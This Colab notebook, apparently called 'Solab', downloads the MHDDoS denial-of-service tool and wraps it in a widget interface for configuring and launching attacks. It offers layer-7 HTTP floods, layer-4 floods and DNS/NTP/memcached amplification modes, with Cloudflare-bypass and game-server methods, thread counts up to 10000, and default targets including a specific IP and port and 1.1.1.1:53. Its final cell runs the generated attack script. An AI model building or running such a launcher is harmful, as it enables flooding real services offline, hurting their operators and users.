<a href="https://colab.research.google.com/github/SeniorSpirit/Solab/blob/main/Solab.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [38]:
#@title Setup { form-width: "25%" }
#@markdown - Download And Configure Solab

import os
import sys
from tqdm.notebook import tqdm
import subprocess

print()
cmds = [
    ("./requirements.txt","wget https://raw.githubusercontent.com/MatrixTM/MHDDoS/main/requirements.txt"),
    ("./config.json","wget https://raw.githubusercontent.com/MatrixTM/MHDDoS/main/config.json"),
    ("./start.py","wget https://raw.githubusercontent.com/MatrixTM/MHDDoS/main/start.py"),
    ("./files/referers.txt","wget -P ./files https://raw.githubusercontent.com/MatrixTM/MHDDoS/main/files/referers.txt"),
    ("./files/useragent.txt","wget -P ./files https://raw.githubusercontent.com/MatrixTM/MHDDoS/main/files/useragent.txt"),
    ("./files/proxies/http.txt","wget -P ./files/proxies/ https://raw.githubusercontent.com/MatrixTM/MHDDoS/main/files/proxies/http.txt"),
    ("./Solab/config.json", "wget -P ./Solab https://raw.githubusercontent.com/SeniorSpirit/Solab/main/Solab/config.json"),
    ("dependencies","pip install -r requirements.txt"),
    ("numba", "pip install numba"),
    ("cuda", "pip install cuda-python"),
    ("ipywidgets", "pip install ipywidgets"),
    ("enable jupyter widgets", "jupyter nbextension enable --py widgetsnbextension")
]

flag = []

with tqdm(total = len(cmds), file = sys.stdout) as bar:
    for i in range(len(cmds)):
        bar.set_description("Resolving %s" % cmds[i][0])
        if not os.access(cmds[i][0], os.F_OK):
            try:
                os.system(cmds[i][1])
            except:
                if(i == 0):
                    print("Unable to download %s, please check your internet connection." % cmds[i][0])
                else:
                    print("\033[31mUnexpected error downloading %s.\033[0m" % cmds[i][0])
                    flag.append(cmds[i][0])
        else:
            bar.write("%s already exists." % (cmds[i][0]))
        bar.update()
    bar.close()

if not flag:
    print("\033[32mSuccessfully installed.\033[0m")
else:
    s = ''
    for i in flag:
        s += i + ", "
    s = s[:-2]
    print("\033[31mUnexpected error occurred while downloading %s.\033[0m" % s)

  0%|          | 0/12 [00:00<?, ?it/s]

In [ ]:

#@title Configue MHDDoS
import os
from json import load, dump, dumps
from matplotlib.pyplot import table
from tqdm.notebook import tqdm
from logging import basicConfig, getLogger
from contextlib import suppress
import ipywidgets as widgets
from IPython.display import display
import subprocess

basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
            datefmt="%H:%M:%S")
logger = getLogger("Solab")
logger.setLevel("INFO")

class colors:
    ERROR = '\033[31m'
    SUCCESS = '\033[32m'
    BLUE = '\033[34m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    RESET = '\033[0m'
    WARN = '\033[33m'

config_url = 'config.json'

global_config = {}

def save_config(config_name: str, config_dict: dict):
    if config_name in global_config.keys():
            global_config[config_name] = config_dict
    else:
        global_config.update({
            config_name:config_dict
        })

    with open(config_url, "w+") as f:
        dump(global_config, f, indent=4)

class Interface:
    mode: str
    temp_config: dict = {}
    cur_config_name: str = ""
    
    def __enter__(self):
        return self
    
    def __exit__(self, exc_type, exc_value, traceback):
        return

    def get_cur_config(self) -> dict:
        return self.temp_config

    def set_mode(self, mode: str) -> str:
        self.mode = mode
        if 'L7' in mode:
            self.temp_config = {
                "method":"bypass",# type of attack.
                "target":"https://example.com",# target url or ip address.
                "socks_type":"5",# proxy type(0-all, 1-http, 4-socks4, 5-socks5, 6-random).
                "threads":"400",# number of threads.
                "proxylist":"socks5.txt",# proxy file.
                "rpc":"100",# requests pre connection.
                "duration":"3600",# time to finish attack(second).
                "debug":"false",# debug mode(true or false).
                "type":"L7"# attack mode(L7, L4, L4_proxied, L4_ampl).
            }
        elif 'proxied' in mode:
            self.temp_config = {
                "method":"minecraft",# type of attack.
                "target":"202.189.7.119:25577",# format: ip:port.
                "threads":"1000",# number of threads.
                "duration":"3600",# time to finish attack(second).
                "socks_type":"5",# proxy type(0-all, 1-http, 4-socks4, 5-socks5, 6-random).
                "proxylist":"socks5.txt",# proxy file.
                "debug":"false",# debug mode(true or false).
                "type":"L4_proxied"
            }
        elif 'ampl' in mode:
            self.temp_config = {
                "method":"dns",# type of attack.
                "target":"1.1.1.1:53",# format: ip:port.
                "threads":"100",# number of threads.
                "duration":"3600",# time to finish attack(second).
                "reflectors_file":"dns.txt",#those who know it all know it..
                "debug":"false",# debug mode(true or false).
                "type":"L4_ampl"
            }
        else:
            self.temp_config = {
                "method":"udp",# type of attack.
                "target":"1.1.1.1:53",# format: ip:port.
                "threads":"1",# number of threads.
                "duration":"3600",# time to finish attack(second).
                "debug":"false",# debug mode(true or false).
                "type":"L4"
            }
        return "current mode: %s" % self.mode

    def set_config_values(self, key: str, value: str):
        self.temp_config[key] = value
    
    def load_config(self, config_name: str) -> None:
        self.cur_config_name = config_name
        self.set_mode( mode = global_config[self.cur_config_name]['type'])
        for key in global_config[config_name]:
            self.temp_config[key] = global_config[config_name][key]
        logger.info(colors.SUCCESS + "Successfully loaded the config '%s'." % config_name + colors.RESET)

def main():
    global global_config
    print('''
\033[32m---------------------------------------------------
                                                                                 
                                                             bbbbbbbb            
   SSSSSSSSSSSSSSS                  lllllll                  b::::::b            
 SS:::::::::::::::S                 l:::::l                  b::::::b            
S:::::SSSSSS::::::S                 l:::::l                  b::::::b            
S:::::S     SSSSSSS                 l:::::l                   b:::::b            
S:::::S               ooooooooooo    l::::l   aaaaaaaaaaaaa   b:::::bbbbbbbbb    
S:::::S             oo:::::::::::oo  l::::l   a::::::::::::a  b::::::::::::::bb  
 S::::SSSS         o:::::::::::::::o l::::l   aaaaaaaaa:::::a b::::::::::::::::b 
  SS::::::SSSSS    o:::::ooooo:::::o l::::l            a::::a b:::::bbbbb:::::::b
    SSS::::::::SS  o::::o     o::::o l::::l     aaaaaaa:::::a b:::::b    b::::::b
       SSSSSS::::S o::::o     o::::o l::::l   aa::::::::::::a b:::::b     b:::::b
            S:::::So::::o     o::::o l::::l  a::::aaaa::::::a b:::::b     b:::::b
            S:::::So::::o     o::::o l::::l a::::a    a:::::a b:::::b     b:::::b
SSSSSSS     S:::::So:::::ooooo:::::ol::::::la::::a    a:::::a b:::::bbbbbb::::::b
S::::::SSSSSS:::::So:::::::::::::::ol::::::la:::::aaaa::::::a b::::::::::::::::b 
S:::::::::::::::SS  oo:::::::::::oo l::::::l a::::::::::aa:::ab:::::::::::::::b  
 SSSSSSSSSSSSSSS      ooooooooooo   llllllll  aaaaaaaaaa  aaaabbbbbbbbbbbbbbbb   
\033[32m---------------------------------------------------
\033[32mCoded by SeniorSpirit.
\033[32m---------------------------------------------------\033[0m
''')

    #load config.
    logger.info("Loading config...")
    try:
        with open(config_url, 'r') as f:
            global_config = load(f)
            logger.info("Successfully loaded config.")
    except:
        logger.error(colors.ERROR + "Unable to load config." + colors.RESET)

    with Interface() as inter:
        ops = list(global_config.keys())
        ops.append("Customize")
        rdbuttons = widgets.RadioButtons(
            options= ops,
            layout= {'width': 'max-content'}, # If the items' names are long
            description= 'Please select a config or customize a config:',
            disabled= False,
            align_items='stretch',
            style = {'description_width': 'initial'}
        )
        btn = widgets.Button(description='Confirm')
        display(rdbuttons, btn)
        def on_button_clicked(b):
            answer = rdbuttons.get_interact_value()
            rdbuttons.close()
            btn.close()
            customize_or_load(answer, inter)
        btn.on_click(on_button_clicked)

def customize_or_load(name: str, inter: Interface):
    if name == 'Customize':
        custom(inter)
    else:
        inter.load_config(name)
        configure(inter)

def configure(inter: Interface):
    args = ""
    for arg in inter.get_cur_config().values():
        arg_str = str(arg)
        if 'L4' in arg_str or 'L7' in arg_str:
            break
        args += arg_str + " "
    logger.info("the args: %s" % args)
    f = open("bashscript.sh", "w")
    f.write("python3 start.py " + args)
    f.close()
    f_win = open("batscript.bat", "w")
    f_win.write("python start.py " + args)
    f_win.close()
    logger.info(colors.SUCCESS + 'Successfully configured config. Now run the next cell.' + colors.RESET)

def custom(inter: Interface):
    
    def set_name(inter: Interface):
        text_field = widgets.Text(
            value = "New Config",
            placeholder = "The config name",
            description = "Name the config:",
            disabled = False,
            align_items='stretch',
            layout = {'width': 'max-content'}, # If the items' names are long
            style = {'description_width': 'initial'}
        )
        display(text_field)
        def callback(obj):
            inter.cur_config_name = obj.value
            text_field.close()
            mode_select(inter)

        text_field.on_submit(callback)
        
    def mode_select(inter: Interface):
        rdbuttons = widgets.RadioButtons(
            options= ["L7", "L4", "L4_proxied", "L4_ampl"],# Defaults to 'L7'
            description= 'Which mode do you want to select?',
            disabled= False,
            align_items='stretch',
            layout= {'width': 'max-content'}, # If the items' names are long
            style = {'description_width': 'initial'}
        )
    
        btn = widgets.Button(description='Confirm')
        display(rdbuttons, btn)
        def on_button_clicked(b):
            inter.set_mode(rdbuttons.get_interact_value())
            rdbuttons.close()
            btn.close()
            set_values(inter)
            
        btn.on_click(on_button_clicked)

    def set_values(inter: Interface):
        for key in inter.temp_config:
            if key == "method":
                opts = ["CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD","NULL",
                        "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM","APACHE", "XMLRPC", "BOT",
                        "BOMB", "DOWNLOADER", "KILLER", "TOR", "RHEX", "STOMP"] if 'L7' in inter.mode else (
                        ["MEM","NTP", "DNS", "ARD","CLDAP", "CHAR", "RDP"] if "ampl" in inter.mode else
                        ["TCP", "UDP", "SYN", "VSE", "MINECRAFT","MCBOT", "CONNECTION", "CPS", "FIVEM","TS3",
                         "MCPE", "ICMP"])
                
                methods = widgets.RadioButtons(
                    options = opts,
                    description = 'Which method do you want to select?',
                    disabled = False,
                    align_items='stretch',
                    layout = {'width': 'max-content'}, # If the items' names are long
                    style = {'description_width': 'initial'}
                )
                display(methods)
                
            if key == "target":
                text_field = widgets.Text(
                    value = "" if 'L7' in inter.mode else "",
                    placeholder = "format: https://example.com" if 'L7' in inter.mode else "format: IP:Port",
                    description = "Input ur target:",
                    disabled = False,
                    align_items='stretch',
                    style = {'description_width': 'initial'}
                )
                display(text_field)
                def callback(obj):
                    inter.set_config_values("target", obj.value)
                text_field.on_submit(callback)
                
            if key == "socks_type":
                # (0-all, 1-http, 4-socks4, 5-socks5, 6-random).
                socks = widgets.RadioButtons(
                    options = ["all", "http", "socks4", "socks5", "random"],
                    description = 'Which socks_type do you want to select?',
                    disabled = False,
                    align_items='stretch',
                    layout = {'width': 'max-content'}, # If the items' names are long
                    style = {'description_width': 'initial'}
                )
                display(socks)

            if key == "threads":
                threads_slider = widgets.IntSlider(
                    value = 400,
                    min = 1,
                    max = 10000,
                    step = 1,
                    description = "Set the number of thread:",
                    disabled = False,
                    continuous_update=False,
                    orientation='horizontal',
                    readout=True,
                    readout_format='d',
                    align_items='stretch',
                    layout=widgets.Layout(width='30%'), # If the items' names are long
                    style = {'description_width': 'initial'}
                )
                display(threads_slider)
                
            if key == "proxylist":
                proxy_text_field = widgets.Text(
                    value = "socks5.txt",
                    placeholder = "all.txt/http.txt/socks4.txt/socks5.txt/your own proxylist",
                    description = "Input the proxy file:",
                    disabled = False,
                    align_items='stretch',
                    layout = {'width': 'max-content'},
                    style = {'description_width': 'initial'}
                )
                display(proxy_text_field)
                def proxy_callback(obj):
                    inter.set_config_values("proxylist", obj.value)
                proxy_text_field.on_submit(proxy_callback)

            if key == "rpc":
                rpc_slider = widgets.IntSlider(
                    value = 100,
                    min = 1,
                    max = 1000,
                    step = 1,
                    description = "Set the number of requests pre connection:",
                    disabled = False,
                    continuous_update=False,
                    orientation='horizontal',
                    readout=True,
                    readout_format='d',
                    align_items='stretch',
                    layout=widgets.Layout(width='30%'), # If the items' names are long
                    style = {'description_width': 'initial'}
                )
                display(rpc_slider)

            if key == "duration":
                dur_text_field = widgets.Text(
                    value = "0/0/59",
                    placeholder = "format: hours/minutes/seconds",
                    description = "Input the duration time:",
                    disabled = False,
                    align_items='stretch',
                    style = {'description_width': 'initial'}
                )
                display(dur_text_field)
                def dur_callback(obj):
                    h, m, s = (obj.value).split("/")
                    t = int(h) * 3600 + int(m) * 60 + int(s)
                    inter.set_config_values("duration", t)
                dur_text_field.on_submit(dur_callback)

            if key == "debug":
                de_check = widgets.Checkbox(
                    value=False,
                    description='Toggle debug mode',
                    disabled=False
                )
                display(de_check)

            if key == "reflectors_file":
                re_text_field = widgets.Text(
                    value = "",
                    placeholder = "those who know it all know it",
                    description = "Input the reflectors file url",
                    disabled = False,
                    align_items='stretch',
                    style = {'description_width': 'initial'}
                )
                display(re_text_field)
                def re_callback(obj):
                    inter.set_config_values("reflectors_file", obj.value)
                re_text_field.on_submit(re_callback)

            if key == "type":
                confirm_btn = widgets.Button(description='Confirm')
                display(confirm_btn)
                def on_button_clicked(b):
                    inter.set_config_values("method", methods.value)
                    
                    inter.set_config_values("target", text_field.value) # target
                    
                    if 'proxied' in inter.mode or 'L7' in inter.mode:
                        socks_value = {
                            "all": "0",
                            "http":"1",
                            "socks4":"4",
                            "socks5":"5",
                            "random":"6"
                        }
                        inter.set_config_values("socks_type", socks_value[socks.value])
                    
                    if 'proxied' in inter.mode or 'L7' in inter.mode:
                        inter.set_config_values("proxylist", proxy_text_field.value)
                    
                    inter.set_config_values("threads", threads_slider.value)

                    if 'L7' in inter.mode:
                        inter.set_config_values("rpc", rpc_slider.value)
                        
                    h, m, s = (dur_text_field.value).split("/")
                    t = int(h) * 3600 + int(m) * 60 + int(s)
                    inter.set_config_values("duration", t)
                    
                    if 'ampl' in inter.mode:
                        inter.set_config_values("reflectors_file", re_text_field.value)
                    
                    inter.set_config_values("debug", de_check.value)

                    save_config(inter.cur_config_name, inter.temp_config)
                    logger.info("Successfully saved config.")
                    confirm_btn.close()
                    configure(inter)

                confirm_btn.on_click(on_button_clicked)
                
    set_name(inter)

if __name__ == "__main__":
    main()

In [ ]:
#@title Run MHDDoS
!sh bashscript.sh